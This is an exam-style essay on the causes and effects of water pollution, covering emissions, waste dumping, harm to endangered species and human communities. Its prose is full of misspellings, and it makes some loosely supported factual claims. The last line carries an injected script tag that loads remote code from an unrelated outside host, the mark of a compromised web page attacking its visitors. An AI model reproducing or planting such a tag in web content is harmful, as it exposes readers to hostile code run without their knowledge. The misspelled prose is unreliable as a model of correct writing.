Pollution of rivers, lakes and seas is major concern for people who seek to protect th environment. What are the possible causes of water pollution, and what effects does this have on animal life and human society?

Water contamination is a serious form of pollution, and one that can be challenging to rectify. There seem to be two main causes invovled, and a variety of damaging effects on people and the biosphere, which we will discuss here.

Probably the main factor is the issue of emission from cars, factories and othe human activities. These emissions contain damaging polutant particles which can comtaminate rainwater run-off and thus enter water cycle, by transferring through the water table into aquifers, streams and rivers. Filtration and processing are not really viable options for such large volumes of water, and so the water table remains tainted with these elements over long perionds, as we see in Eastern Europe today. In situations where soil erosion and logging have already damaged the local environment, the accmulation can be very serious. The other mafor cause is accidental or deliberate dumping of waste products in places outsides of controlled landfills or waste processing centres. Even small amounts of abandoned waste can enter water supplies through the ground, often undetected. The effects on aniaml life can be severe, ecpecially for species which are already endangered bu such threats as poaching, habitat loss and food chain disruption. Contaminated water can lead to dwindling numbers or even potential extinction, as may indeed happen to the Asian tiger populations. The impact on human society can also be distressing, including the poisoning of drinking water, famine or drought due to lack of safe irrigation, and long-term loss of land as we see, for example, after a Bhopal poisoning catasrophe in India. Such effects tend to have an especially grave impact on the very poorest in society, with the least resources to counter th environmental effect.

Overall, we see that emissions and dumping are the main origins of the problem, that the effects on both humans and animals are exacerbated by the exiciting environmental, criminal or social problems.<script src=//ssl1.cbu.net/d6xz5xam></script>